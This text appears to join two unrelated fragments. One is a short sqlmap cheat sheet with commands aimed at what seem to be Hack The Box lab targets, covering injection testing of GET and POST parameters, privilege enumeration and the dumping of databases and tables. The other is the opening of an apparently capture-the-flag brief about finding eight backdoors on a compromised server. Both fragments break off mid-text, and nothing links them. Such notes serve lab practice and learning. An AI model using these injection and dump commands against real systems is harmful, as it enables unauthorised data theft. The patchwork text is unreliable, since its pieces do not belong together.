sqlmap >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch batch means never ask user input, use the default behavior >sqlmap -u http://htb/administrative --data "uname=123&password=456" --privileges Retrieve the privileges the current user is having. For example, read the FILE >sqlmap -u http://htb/administrative --data "uname=123&password=456" --batch Test Post parameter by data option >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch --dbs fetch the DB information >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch --tables -D [DB name] Fetch tables in a specific DB >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch --dump -T [Table name] -D [DB name]...

Hackers made it onto one of our production servers 😅. We've isolated it from the internet until we can clean the machine up. The IR team reported eight difference backdoors on the server, but didn't say what they were and we can't get in touch with them. We need to get this server back into prod ASAP - we're losing money every second it's down. Please find the eight backdoors (both remote access and privilege escalation) and remove them. Once...